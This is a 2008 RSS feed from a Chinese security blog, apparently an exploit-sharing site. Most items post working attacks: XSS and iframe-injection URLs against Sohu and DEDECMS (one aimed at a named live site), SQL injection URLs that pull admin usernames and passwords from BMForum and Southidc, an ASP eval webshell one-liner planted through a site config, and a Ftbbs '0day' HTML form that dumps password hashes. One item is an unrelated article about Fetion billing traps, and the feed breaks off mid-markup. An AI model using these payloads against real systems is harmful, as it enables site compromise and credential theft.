<?xml version="1.0" encoding="utf-8"?><?xml-stylesheet href='http://feed.feedsky.com/styles/feedsky2.xsl' type='text/xsl' ?><!--这是一个由Feedsy提供技术支持的Feed，为了提高读者阅读的体验，以及满足用户美化自己Feed的需要，我们设计了多种精美的Feed模板，提供给大家选择，所有最终呈现出来的样式，皆由用户自愿选择使用，未经许可，任何团体和个人，请不要擅自修改样式或者盗用，这是对于用户选择权的尊重。--><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:fs="http://www.feedsky.com/namespace/feed" xmlns:dc="http://purl.org/dc/elements/1.1/" version="2.0"><channel><atom:link href="http://feed.feedsky.com/tlk8" type="application/rss+xml" rel="self"></atom:link><fs:self_link href="http://feed.feedsky.com/tlk8" type="application/rss+xml"></fs:self_link><lastBuildDate>Sun, 05 Oct 2008 02:54:12 GMT</lastBuildDate><title>KOK的博客</title><description>为在5.12地震中遇难的同胞哀悼！</description><link>http://tlk.net.ru/index.php</link><language>zh-cn</language><copyright>KOK's Blog</copyright><item><title>搜狐存在多处跨站攻击漏洞</title><link>http://item.feedsky.com/~feedsky/tlk8/~7114500/120930384/5165305/1/item.html</link><description>测试代码仅供安全研究&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;div class=&quot;code&quot;&gt;http://db.auto.sohu.com/searchQuery.sip?queryTerm=%3Cscript%3Ealert%28%22tian6%22%29%3C%2Fscript%3E&amp;amp;pageNo=1&lt;/div&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;div class=&quot;code&quot;&gt;http://baodian.women.sohu.com/search.sip?item=&amp;lt;iframe src=http://bbs.tian6.com/ width=200 height=200&amp;gt;&amp;lt;/iframe&amp;gt;&amp;amp;pageNo=1&amp;amp;type=suggest&amp;amp;onePageNum=10&amp;amp;flag=common&amp;amp;totalText=&amp;lt;iframe src=http://bbs.tian6.com/ width=200 height=200&amp;gt;&amp;lt;/iframe&amp;gt;&amp;amp;itemText=&amp;lt;iframe src=http://bbs.tian6.com/ width=200 height=200&amp;gt;&amp;lt;/iframe&amp;gt;&amp;amp;appFlag=true&lt;/div&gt;&lt;br/&gt;Tags - &lt;a href=&quot;http://tlk.net.ru/tags/%25E6%2590%259C%25E7%258B%2590/&quot; rel=&quot;tag&quot;&gt;搜狐&lt;/a&gt; , &lt;a href=&quot;http://tlk.net.ru/tags/%25E8%25B7%25A8%25E7%25AB%2599%25E6%2594%25BB%25E5%2587%25BB%25E6%25BC%258F%25E6%25B4%259E/&quot; rel=&quot;tag&quot;&gt;跨站攻击漏洞&lt;/a&gt;&lt;br /&gt;&lt;!-- Feedsky flare --&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=b2ef4d2bf5dc6867612b229546cf14e1&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=b2ef4d2bf5dc6867612b229546cf14e1&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=66d8fed6d77d7b27b7ca5337ffa65edd&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=66d8fed6d77d7b27b7ca5337ffa65edd&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=d22ec37b0615297039ae8e5ecde94313&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=d22ec37b0615297039ae8e5ecde94313&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=3e4185107318b671883e371ba83c946f&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=3e4185107318b671883e371ba83c946f&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=de763f70390db549df276a57dd5d9975&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=de763f70390db549df276a57dd5d9975&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=21224b17e2b3e60b5132e5332c307eb6&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=21224b17e2b3e60b5132e5332c307eb6&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=458a3bd49a1b401c9688d58ffd031914&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=458a3bd49a1b401c9688d58ffd031914&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;!-- /Feedsky flare --&gt;</description><category>Bug&amp;amp;EXP</category><pubDate>Sun, 05 Oct 2008 10:54:12 +0800</pubDate><author>kok &lt;k@tlk8.cn&gt;</author><guid isPermaLink="false">http://tlk.net.ru/post/294/</guid><dc:creator>kok &lt;k@tlk8.cn&gt;</dc:creator><fs:srclink>http://tlk.net.ru/post/294/</fs:srclink><fs:srcfeed>http://tlk.net.ru/feed.php</fs:srcfeed><fs:itemid>feedsky/tlk8/~7114500/120930384/5165305</fs:itemid></item><item><title>DEDECMS 跨站攻击漏洞</title><link>http://item.feedsky.com/~feedsky/tlk8/~7114500/120930385/5165305/1/item.html</link><description>漏洞文件：include/jump.php&lt;br/&gt;&lt;br/&gt;以下是漏洞代码：&lt;br/&gt;&lt;br/&gt;&lt;div class=&quot;code&quot;&gt;Copy code&amp;lt;?php &lt;br/&gt;if(!empty($_GET&amp;#91;&amp;#039;gurl&amp;#039;&amp;#93;))&amp;#123;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;echo &amp;quot;&amp;lt;script&amp;gt;location=&amp;#92;&amp;quot;&amp;#123;$_GET&amp;#91;&amp;#039;gurl&amp;#039;&amp;#93;&amp;#125;&amp;#92;&amp;quot;;&amp;lt;/script&amp;gt;&amp;quot;;&lt;br/&gt;&amp;#125;&lt;/div&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;div class=&quot;code&quot;&gt;http://www.ourwx.com/include/jump.php?gurl=%23&amp;quot;&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;alert(/bbs.tian6.com/)&amp;lt;/script&amp;gt;&lt;/div&gt;&lt;br/&gt;Tags - &lt;a href=&quot;http://tlk.net.ru/tags/dedecms/&quot; rel=&quot;tag&quot;&gt;dedecms&lt;/a&gt; , &lt;a href=&quot;http://tlk.net.ru/tags/%25E8%25B7%25A8%25E7%25AB%2599%25E6%25BC%258F%25E6%25B4%259E/&quot; rel=&quot;tag&quot;&gt;跨站漏洞&lt;/a&gt;&lt;br /&gt;&lt;!-- Feedsky flare --&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=06b3219843f0b4637930a43bd6cae1b1&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=06b3219843f0b4637930a43bd6cae1b1&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=33f972e881474b17e6f5df924254dc25&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=33f972e881474b17e6f5df924254dc25&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=6a6347599806b74c21f184ac03d368f4&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=6a6347599806b74c21f184ac03d368f4&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=7550d7f9ef9c3ecb3f802f12ac3a28db&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=7550d7f9ef9c3ecb3f802f12ac3a28db&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=68a17eb63929f64023ab4b9556892571&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=68a17eb63929f64023ab4b9556892571&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=7a5cf5362eb47dee9122e345cdd20ba5&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=7a5cf5362eb47dee9122e345cdd20ba5&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=82918b1498d5f38176be18652b6bff22&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=82918b1498d5f38176be18652b6bff22&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;!-- /Feedsky flare --&gt;</description><category>Bug&amp;amp;EXP</category><pubDate>Sun, 05 Oct 2008 10:52:01 +0800</pubDate><author>kok &lt;k@tlk8.cn&gt;</author><guid isPermaLink="false">http://tlk.net.ru/post/293/</guid><dc:creator>kok &lt;k@tlk8.cn&gt;</dc:creator><fs:srclink>http://tlk.net.ru/post/293/</fs:srclink><fs:srcfeed>http://tlk.net.ru/feed.php</fs:srcfeed><fs:itemid>feedsky/tlk8/~7114500/120930385/5165305</fs:itemid></item><item><title>BMForumplugins.phpSQL注入漏洞</title><link>http://item.feedsky.com/~feedsky/tlk8/~7114500/120930386/5165305/1/item.html</link><description>&lt;span style=&quot;color: #DC143C;&quot;&gt;PS:我在某百度空间看到此漏洞,但博主非常MJJ,没有写明漏洞发现者,对此向作者表示抱歉.! 请联系我!&lt;/span&gt;&lt;br/&gt;发布日期： 2008年一十○月1日上午12时00分&lt;br/&gt;更新日期： 08年十月2日下午4点48分&lt;br/&gt;影响版本： BMForum BMForum 5.6 或其他版本(未测)&lt;br/&gt;讨论&lt;br/&gt;BMForum很容易的SQL注入漏洞，因为它未能充分消毒用户提供的数据，然后用它在一个SQL查询。 &lt;br/&gt;&lt;br/&gt;开发这一问题可能会允许攻击者妥协的应用，访问或修改数据，或利用潜在的安全漏洞的基本数据库。 &lt;br/&gt;&lt;br/&gt;BMForum 5.6是脆弱的;其他版本也可能受到影响。&lt;br/&gt;&lt;br/&gt;注入方法(仅供安全研究)&lt;br/&gt;&lt;br/&gt;&lt;div class=&quot;code&quot;&gt;http://www.example.com/&amp;#91;installdir&amp;#93;/plugins.php?p=tags&amp;amp;amp;forumid=0&amp;amp;amp;tagname=-1&amp;#039;+union+select+1,concat_ws(0x3a,username,pwd),3,4+from+bmb_userlist+where+userid=1/*&lt;/div&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;Tags - &lt;a href=&quot;http://tlk.net.ru/tags/bmforum/&quot; rel=&quot;tag&quot;&gt;bmforum&lt;/a&gt; , &lt;a href=&quot;http://tlk.net.ru/tags/sql%25E6%25B3%25A8%25E5%2585%25A5%25E6%25BC%258F%25E6%25B4%259E/&quot; rel=&quot;tag&quot;&gt;sql注入漏洞&lt;/a&gt;&lt;br /&gt;&lt;!-- Feedsky flare --&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=44581f2a6b16474d31bd4f1c81fb9b25&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=44581f2a6b16474d31bd4f1c81fb9b25&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=43c8ed03c97ea018b25a70738101c2fd&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=43c8ed03c97ea018b25a70738101c2fd&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=a6139194a4f90479e95735ad3c13d7b1&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=a6139194a4f90479e95735ad3c13d7b1&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=3648d60bc284214d36033700039d0dbc&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=3648d60bc284214d36033700039d0dbc&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=0fbe8eb5dffcc51f7e23252d2a354573&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=0fbe8eb5dffcc51f7e23252d2a354573&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=ecf03598383e509fc9472a4be5fafe57&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=ecf03598383e509fc9472a4be5fafe57&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=7e33fab91fd31437e0e11ad63b1ab9f8&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=7e33fab91fd31437e0e11ad63b1ab9f8&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;!-- /Feedsky flare --&gt;</description><category>Bug&amp;amp;EXP</category><pubDate>Sun, 05 Oct 2008 10:37:07 +0800</pubDate><author>kok &lt;k@tlk8.cn&gt;</author><guid isPermaLink="false">http://tlk.net.ru/BMForum-plugins-SQL-Injection/</guid><dc:creator>kok &lt;k@tlk8.cn&gt;</dc:creator><fs:srclink>http://tlk.net.ru/BMForum-plugins-SQL-Injection/</fs:srclink><fs:srcfeed>http://tlk.net.ru/feed.php</fs:srcfeed><fs:itemid>feedsky/tlk8/~7114500/120930386/5165305</fs:itemid></item><item><title>南方数据企业 注入漏洞</title><link>http://item.feedsky.com/~feedsky/tlk8/~7114500/120930387/5165305/1/item.html</link><description>来源：&lt;a href=&quot;http://www.pcsec.org/&quot; target=&quot;_blank&quot;&gt;http://www.pcsec.org/&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;发现日期:&lt;br/&gt;&lt;br/&gt;2008-09-25&lt;br/&gt;影响版本: v10.0 v11.0&lt;br/&gt;&lt;br/&gt;Exploit: &lt;br/&gt;&lt;div class=&quot;code&quot;&gt;http://www.southidc.net/0791idc11Q/NewsType.asp?SmallClass=&amp;#039;%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20&amp;#039;&amp;#039;=&amp;#039;&lt;/div&gt;&lt;br/&gt;获取shell方法:&lt;br/&gt;&lt;br/&gt;在网站配置[&lt;a href=&quot;http://www.target.com/admin/SiteConfig.asp&quot; target=&quot;_blank&quot;&gt;http://www.target.com/admin/SiteConfig.asp&lt;/a&gt;]的版权信息里写入&quot;%&gt;&lt;%eval(request(chr(35)))%&gt;&lt;%'&lt;br/&gt;成功把shell写入&lt;a href=&quot;http://www.target.com/inc/config.asp&quot; target=&quot;_blank&quot;&gt;http://www.target.com/inc/config.asp&lt;/a&gt;&lt;br/&gt;Tags - &lt;a href=&quot;http://tlk.net.ru/tags/%25E5%258D%2597%25E6%2596%25B9%25E6%2595%25B0%25E6%258D%25AE%25E4%25BC%2581%25E4%25B8%259A/&quot; rel=&quot;tag&quot;&gt;南方数据企业&lt;/a&gt; , &lt;a href=&quot;http://tlk.net.ru/tags/%25E6%25B3%25A8%25E5%2585%25A5%25E6%25BC%258F%25E6%25B4%259E/&quot; rel=&quot;tag&quot;&gt;注入漏洞&lt;/a&gt;&lt;br /&gt;&lt;!-- Feedsky flare --&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=d0525a00e8093fc7c231855cce8000fe&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=d0525a00e8093fc7c231855cce8000fe&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=531bc19379035d0961961135190e66a8&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=531bc19379035d0961961135190e66a8&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=b594dd91e15db5e7dddf699322ef5116&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=b594dd91e15db5e7dddf699322ef5116&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=e85910c69d3ed0fc2d2ea8af522965cf&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=e85910c69d3ed0fc2d2ea8af522965cf&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=772e6f6875358ad4d8a878b0f58c932a&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=772e6f6875358ad4d8a878b0f58c932a&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=6f8289eb814cffecce788f34954a8e46&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=6f8289eb814cffecce788f34954a8e46&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=fbf3814667631c8d523d53410b330d06&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=fbf3814667631c8d523d53410b330d06&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;!-- /Feedsky flare --&gt;</description><category>Bug&amp;amp;EXP</category><pubDate>Sun, 05 Oct 2008 10:31:57 +0800</pubDate><author>kok &lt;k@tlk8.cn&gt;</author><guid isPermaLink="false">http://tlk.net.ru/post/291/</guid><dc:creator>kok &lt;k@tlk8.cn&gt;</dc:creator><fs:srclink>http://tlk.net.ru/post/291/</fs:srclink><fs:srcfeed>http://tlk.net.ru/feed.php</fs:srcfeed><fs:itemid>feedsky/tlk8/~7114500/120930387/5165305</fs:itemid></item><item><title>飞信的收费技巧,谨防飞信收费陷阱~</title><link>http://item.feedsky.com/~feedsky/tlk8/~7114500/120769353/5165305/1/item.html</link><description>本文来自飞信下载博客 &lt;a href=&quot;http://www.fetiondownload.cn/post/fetion-shoufei-xianjing.html&quot; target=&quot;_blank&quot;&gt;http://www.fetiondownload.cn/post/fetion-shoufei-xianjing.html&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;大家在下载飞信,使用飞信的时候``有的时候会莫名其妙的发现话费少了`今天飞信下载博客就为大家详细分析一下飞信使用过程中的一些收费陷阱``大家注意避开~~打到万恶的中国移动~~&lt;br/&gt;&lt;br/&gt;飞信的收费技巧 &lt;br/&gt;飞信软件是中国移动今年6月发布的一款方便、快捷的沟通工具。在许多媒体的广告上中国移动利用“无限量免费”五个字赚足了用户的眼球， &lt;br/&gt;&lt;br/&gt;　　但是从两个月的用户反映来看，“免费”其实只是飞信特性中极小的一个部分，适用范围也仅限于“从PC给飞信好友”。加上飞信对手机客户端要求高，用户不能自由选择个性账号。虽然中国移动花费了不菲的广告费用，飞信并没有被用户接受。 &lt;br/&gt;&lt;br/&gt;　　为你的流量买单 &lt;br/&gt;&lt;br/&gt;　　飞信目前有两个功能，分别是飞信聊天和飞信交友，你注册以后会以飞信用户和飞信交友用户进行区别。 &lt;br/&gt;&lt;br/&gt;　　之前飞信的广告中一直宣扬“无限量免费发送短信”，但是据了解，仅仅只有从电脑客户端到手机客户端的短信是免费，如果用开通飞信功能的手机发短信到电脑客户端，必须先登陆软件平台。也就是说，飞信手机用户在登陆后可以享受短信免费服务，但是用户要为自己登录飞信之后所产生的GPRS流量买单。 &lt;br/&gt;&lt;br/&gt;　　很多用户可能以为移动还是慷慨的，因为基础功能是免收功能费的，短信费用是免收通信费的。短信是免了通信费，但流量费却是很多人看不见摸不着的。许多移动聊天用户选择飞信正是看中了其随时聊天的功能，长时间在线聊天所产生的流量费并不是用户自己可以计算的。 &lt;br/&gt;&lt;br/&gt;　　悄悄收你朋友的费 &lt;br/&gt;&lt;br/&gt;　　在某著名手机论坛上，一名名为“sunny”的网友讲述了自己上当的经过。 &lt;br/&gt;&lt;br/&gt;　　“因为经常上网的缘故，加上前段时间我的智能手机维修，突然发现给朋友发短信很不方便，后来看网站上大肆在推广中国移动推出的飞信软件，正在公测，公测期间免费，以后预期每月收5元，不限条数，这下吸引了我，先开了飞信号开始试用，感觉相当不错，丢失短信的现象极少，就逐步开始加好友。用了3天，正在洋洋得意的向老婆宣扬我的勤俭持家的时候，被老婆一顿痛骂，我用飞信发的短信她收竟然要收费！这下惨了，也就是说我让朋友接受我的飞信短信竟然是花朋友的钱！” &lt;br/&gt;&lt;br/&gt;　　来吧，让我们一步步看这名网友是怎样上当的： &lt;br/&gt;&lt;br/&gt;　　问题一：你的朋友必须在收到你通过飞信加为好友的提醒后直接回复“Y”才能收到，只有回复之后才能顺利收发短信。 &lt;br/&gt;&lt;br/&gt;　　问题二：还可以从OUTLOOK里面批量导入，你所有的朋友都要回复“Y”，都成为了飞信的用户。结果就是，你的每个朋友回复Y，其实就是同意用户在接受以161开头的飞信短信的时候同意移动的SP收费一毛！因此，这就成了收短信都要钱了，也就是每条短信的成本，一收一发总共是两毛，你自己是不收费了，可移动一分没少拿。 &lt;br/&gt;&lt;br/&gt;　　问题三：现在你的面临的选择就是劝说你的朋友都上飞信吧，每个朋友每月都因为你要交每月5元的服务费。 &lt;br/&gt;&lt;br/&gt;　　接通即要买单 &lt;br/&gt;&lt;br/&gt;　　飞信的“语音聊天”（以下简称为语音聊天）功能在是用户使用飞信的终端进行与聊天有关的操作的时候，可以启动一个双人或多人的电话会议，即同时有多人通过中国移动的手机同时出现在一个通话中，每个人的说活，其他人都能听到。 &lt;br/&gt;&lt;br/&gt;　　笔者从中国移动的官方网站了解到：用户a向用户B发出语音聊天的邀请，用户B接受语音邀请后，系统会同时外呼用户A和用户B，如果用户A和用户B任何一方接通电话，而另一方未接通电话，这时，系统会按接通电话的用户的接通时长根据语音聊天的费率计费，未接通电话的用户不计费。 &lt;br/&gt;&lt;br/&gt;　　所以，在语音聊天的收费中，通话的计费原则是接通即开始计费。飞信的通话由后台呼叫发起，通话的双方都是被呼叫方，所以只要其中一方接听了，另一方也开始被动计费。在此计费原则下，用户可能因为另一方没有接通而没说上一个字，却也要为此买单。 &lt;br/&gt;&lt;br/&gt;　　由此看来，飞信“免费”对于用户而言绝对不是免费的午餐，用户在使用飞信软件时一定要小心谨慎，提防看不见的收费陷井。 &lt;br/&gt;&lt;br/&gt;Tags - &lt;a href=&quot;http://tlk.net.ru/tags/%25E9%25A3%259E%25E4%25BF%25A1/&quot; rel=&quot;tag&quot;&gt;飞信&lt;/a&gt; , &lt;a href=&quot;http://tlk.net.ru/tags/%25E6%2594%25B6%25E8%25B4%25B9%25E6%258A%2580%25E5%25B7%25A7/&quot; rel=&quot;tag&quot;&gt;收费技巧&lt;/a&gt; , &lt;a href=&quot;http://tlk.net.ru/tags/%25E6%2594%25B6%25E8%25B4%25B9%25E9%2599%25B7%25E9%2598%25B1/&quot; rel=&quot;tag&quot;&gt;收费陷阱&lt;/a&gt;&lt;br /&gt;&lt;!-- Feedsky flare --&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=31b94d483b5db81f0ac4eb3b722e9cda&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=31b94d483b5db81f0ac4eb3b722e9cda&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=c0b57459c9d235e1c0738c7d79c17355&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=c0b57459c9d235e1c0738c7d79c17355&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=9e0e1a5b7226f1c706cc17af1e27ca36&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=9e0e1a5b7226f1c706cc17af1e27ca36&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=3e2654ce233f58ef156f2a2f2dbd5efb&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=3e2654ce233f58ef156f2a2f2dbd5efb&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=38f3b6a41f5db89eff7358614006a68d&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=38f3b6a41f5db89eff7358614006a68d&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=3ec6b31718618c8594f104fd29ade602&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=3ec6b31718618c8594f104fd29ade602&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=1cc25e6dda3c4f25194b5dc99e431fa7&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=1cc25e6dda3c4f25194b5dc99e431fa7&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;!-- /Feedsky flare --&gt;</description><category>网络杂谈</category><pubDate>Sat, 04 Oct 2008 11:34:44 +0800</pubDate><author>kok &lt;k@tlk8.cn&gt;</author><guid isPermaLink="false">http://tlk.net.ru/fetion-shoufei-xianjing/</guid><dc:creator>kok &lt;k@tlk8.cn&gt;</dc:creator><fs:srclink>http://tlk.net.ru/fetion-shoufei-xianjing/</fs:srclink><fs:srcfeed>http://tlk.net.ru/feed.php</fs:srcfeed><fs:itemid>feedsky/tlk8/~7114500/120769353/5165305</fs:itemid></item><item><title>Ftbbs 6.X injection 0day exp</title><link>http://item.feedsky.com/~feedsky/tlk8/~7114500/120659079/5165305/1/item.html</link><description>漏洞描述: 可以直接获取管理员帐号和MD5加密后的密码&lt;br/&gt;&lt;br/&gt;&lt;div class=&quot;code&quot;&gt;&amp;lt;center&amp;gt;&amp;lt;H1&amp;gt;飞天论坛asp版通杀 0day利用程序----by&amp;nbsp;&amp;nbsp;云中鹰&amp;amp;落叶纷飞&amp;lt;/H1&amp;gt;&amp;lt;/center&amp;gt;&lt;br/&gt;&amp;lt;form&amp;nbsp;&amp;nbsp;method=post name=&amp;quot;luoye&amp;quot;&amp;gt;&lt;br/&gt;目标地址：&amp;lt;input name=&amp;quot;act&amp;quot; type=&amp;quot;text&amp;quot; id=&amp;quot;act&amp;quot; size=&amp;quot;140&amp;quot; value=&amp;quot;网址最后要加“/”&amp;quot;&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br/&gt;注入语句：&amp;lt;input type=text size=150 name=userid value=&amp;quot;1 and 1=2 union select 1,2,admin_pwd,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from ftbbs_admin&amp;quot;&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br/&gt;&amp;lt;input type=submit value=Fuck onClick=&amp;quot;javascript:luoye.action=document.all.act.value+&amp;#039;haoyou.asp&amp;#039;;&amp;quot;&amp;gt;&lt;br/&gt;&lt;br/&gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br/&gt;&amp;lt;font color=red&amp;gt;爆所有管理员用户名时，把admin_pwd改为admin_user&amp;lt;/font&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br/&gt;&amp;lt;font color=red&amp;gt;爆所有论坛用户数据时，把表名改为clubuser，用户名字段是clubuser_nickname；密码字段是clubuser_password&amp;lt;/font&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br/&gt;&amp;lt;font color=red&amp;gt;如果想爆单一用户或管理员的数据，请自行加where语句，参考：id、clubuserid&amp;lt;/font&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br/&gt;&amp;lt;font color=blue&amp;gt;以上是6.3版的注射语句，对于6.8版需要把字段数改为61，并且在字段前加自定义的字段头，默认为“ft_”&amp;lt;/font&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;/div&gt;&lt;br/&gt;Tags - &lt;a href=&quot;http://tlk.net.ru/tags/ftbbs/&quot; rel=&quot;tag&quot;&gt;ftbbs&lt;/a&gt; , &lt;a 